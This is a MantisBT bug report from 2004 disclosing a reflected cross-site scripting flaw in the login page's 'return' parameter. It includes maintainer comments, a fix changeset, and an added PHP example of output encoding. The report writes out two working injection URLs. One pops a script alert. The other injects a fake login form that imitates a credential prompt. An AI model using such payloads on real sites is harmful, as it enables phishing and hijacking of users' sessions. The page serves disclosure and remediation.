View Issue Details

ID: 0004044
Project: mantisbt
Category: security
View Status: public
Last Update: 2016-05-26 13:51
Reporter: joxeanpiti
Assigned To: int2str
Priority: urgent
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 0.19.0a1
Fixed in Version: 0.19.0a2
Summary: 0004044: Cross Site Scripting Vulnerability
Description

I found a simple XSS vulnerability, but there may be more.

Please try the following URL:

http://bugs.mantisbt.org/login_page.php?return=%22%3E%3Cscript%3Ealert('Hello')%3C/script%3E

or this

http://bugs.mantisbt.org/login_page.php?return=%22%3E%3Ch3%3ELogin,%20please.%20NOTE:%20This%20is%20the%20newest%20version%3C/h3%3Eusername:%3Cinput%20type=%22edit%22%20%3E%3Cbr%3Epassword:%3Cinput%20type=password%3E%3Cbr%3E%3Cinput%20type=submit%20onclick=javascript:alert('hi')%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E

Additional Information

It is easy to correct it. You need to correctly sanitize ALL the user parameters that are passed.

Tags: No tags attached.

Relationships

related to 0020956 (closed, dregad): CVE-2016-5364: Reflected XSS inside manage_custom_field_edit_page.php

Activities

vboctor

2004-07-08 20:16

manager   ~0005945

This should be fixed in 0.19.0a2.

vboctor

2004-07-08 20:25

manager   ~0005947

By the way, if you have a fix, please post it here. This will save us some time.

joxeanpiti

2004-07-09 14:37

reporter   ~0005965

I don't have a fix, but it is "easy". You need to correctly sanitize the passed strings when you show these strings.

int2str

2004-07-09 19:27

reporter   ~0005967

Checked in a fix for some obvious ones (including the one mentioned in the bug). A more thorough security strategy should be laid out for the future.
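
The output-encoding fix discussed in the comments above, as an added PHP example (not MantisBT's code and not the committed fix). It assumes the `return` value is echoed into a quoted HTML attribute, which the leading `">` in the reported URL suggests; the form markup and function names are hypothetical.

```php
<?php
// Added illustration, not MantisBT source: markup and function names are hypothetical.

// Vulnerable pattern: the request value is written into the attribute verbatim.
function render_return_field_unsafe(string $return): string
{
    return '<form><input type="hidden" name="return" value="' . $return . '"></form>';
}

// Hardened pattern: encode at the point of output, for the HTML attribute context.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid byte sequences.
function render_return_field_safe(string $return): string
{
    $encoded = htmlspecialchars($return, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form><input type="hidden" name="return" value="' . $encoded . '"></form>';
}

// Regression check: parse the rendered markup and report what a browser would build.
function inspect_markup(string $html): array
{
    $previous = libxml_use_internal_errors(true); // keep parser warnings out of the output
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'return_value'    => $input ? $input->getAttribute('value') : null,
    ];
}

// Sample input: the query-string value from the first URL in the report, URL-decoded.
$return = rawurldecode("%22%3E%3Cscript%3Ealert('Hello')%3C/script%3E");

$renderers = ['unsafe' => 'render_return_field_unsafe', 'safe' => 'render_return_field_safe'];
foreach ($renderers as $label => $render) {
    $result = inspect_markup($render($return));
    printf("%-6s script elements: %d, value attribute: %s\n",
        $label, $result['script_elements'], var_export($result['return_value'], true));
}
```

With the unsafe renderer the parsed document contains a `script` element and an empty `value` attribute; with the encoded renderer there is no `script` element and the whole string stays inside `value`.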

Related Changesets

MantisBT: master 8b7fcd3a

2004-07-09 20:29

int2str


* Fix 0004044: Cross Site Scripting Vulnerability

git-svn-id: http://mantisbt.svn.sourceforge.net/svnroot/mantisbt/trunk@2679 f5dc347c-c33d-0410-90a0-b07cc1902cb9
Affected Issues: 0004044
mod - login.php
mod - manage_custom_field_delete.php
mod - login_cookie_test.php
mod - doc/ChangeLog
mod - login_page.php
mod - manage_custom_field_edit_page.php
mod - manage_custom_field_update.php